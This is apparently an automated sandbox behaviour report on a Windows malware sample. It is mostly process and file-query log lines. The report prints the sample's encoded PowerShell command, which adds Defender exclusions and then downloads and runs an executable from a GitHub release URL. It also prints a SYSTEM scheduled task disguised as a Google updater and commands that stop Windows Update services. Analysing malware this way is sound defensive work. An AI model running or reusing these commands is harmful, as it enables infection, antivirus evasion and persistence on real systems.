      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaQBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcABsAHMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBpAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcwBwAHIAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwB0AGEAcgB6AGEAbgByAGUALwBtAHkAcgBlAHAAbwAvAHIAZQBsAGUAYQBzAGUAcwAvAGQAbwB3AG4AbABvAGEAZAAvAGEALwBzAHQAZQBhAG0ALgBlAHgAZQAnACwAIAA8ACMAdQBnAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHEAYQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwAuAGUAeABlACcAKQApADwAIwB2AHQAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AHcAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbABzAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwB2AGMALgBlAHgAZQAnACkAPAAjAGcAZwBtACMAPgA="Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\svc.exe "C:\Users\user\AppData\Local\Temp\svc.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0Jump to behavior
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagwaaqbmacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmacabsahmaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmaawbpagqaiwa+acaalqbgag8acgbjaguaiaa8acmacwbwahiaiwa+adsakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackalgbeag8adwbuagwabwbhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwb0ageacgb6ageabgbyagualwbtahkacgblahaabwavahiazqbsaguayqbzaguacwavagqabwb3ag4ababvageazaavagealwbzahqazqbhag0algblahgazqanacwaiaa8acmadqbnagwaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwbkaheayqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbjahoacqajad4aiaataemaaabpagwazabqageadaboacaajwbzahyaywauaguaeablaccakqapadwaiwb2ahqazwajad4aowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagadwaiwb1ahcazgajad4aiaaoaeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmababzagyaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccacwb2agmalgblahgazqanackapaajagcazwbtacmapga="
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#tcvsvxpo#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.6103.10668.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagwaaqbmacmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmacabsahmaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmaawbpagqaiwa+acaalqbgag8acgbjaguaiaa8acmacwbwahiaiwa+adsakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0ackalgbeag8adwbuagwabwbhagqargbpagwazqaoaccaaab0ahqacabzadoalwavagcaaqb0aggadqbiac4aywbvag0alwb0ageacgb6ageabgbyagualwbtahkacgblahaabwavahiazqbsaguayqbzaguacwavagqabwb3ag4ababvageazaavagealwbzahqazqbhag0algblahgazqanacwaiaa8acmadqbnagwaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwbkaheayqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbjahoacqajad4aiaataemaaabpagwazabqageadaboacaajwbzahyaywauaguaeablaccakqapadwaiwb2ahqazwajad4aowagafmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagadwaiwb1ahcazgajad4aiaaoaeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmababzagyaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccacwb2agmalgblahgazqanackapaajagcazwbtacmapga="Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\svc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#tcvsvxpo#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }Jump to behavior
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD411C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,16_2_00007FF6CD411C64
      Source: C:\Windows\System32\dialer.exeCode function: 16_2_00007FF6CD411C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,16_2_00007FF6CD411C64
      Source: dwm.exe, 0000001A.00000000.1789115824.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000001A.00000002.2969493100.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: winlogon.exe, 00000017.00000000.1771428651.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000002.2944636202.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.1789758214.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: winlogon.exe, 00000017.00000000.1771428651.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000002.2944636202.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.1789758214.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: winlogon.exe, 00000017.00000000.1771428651.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000002.2944636202.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.1789758214.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: winlogon.exe, 00000017.00000000.1771428651.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000002.2944636202.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001A.00000000.1789758214.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Windows\System32\winlogon.exeCode function: 23_2_00000225DC6214A0 cpuid 23_2_00000225DC6214A0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
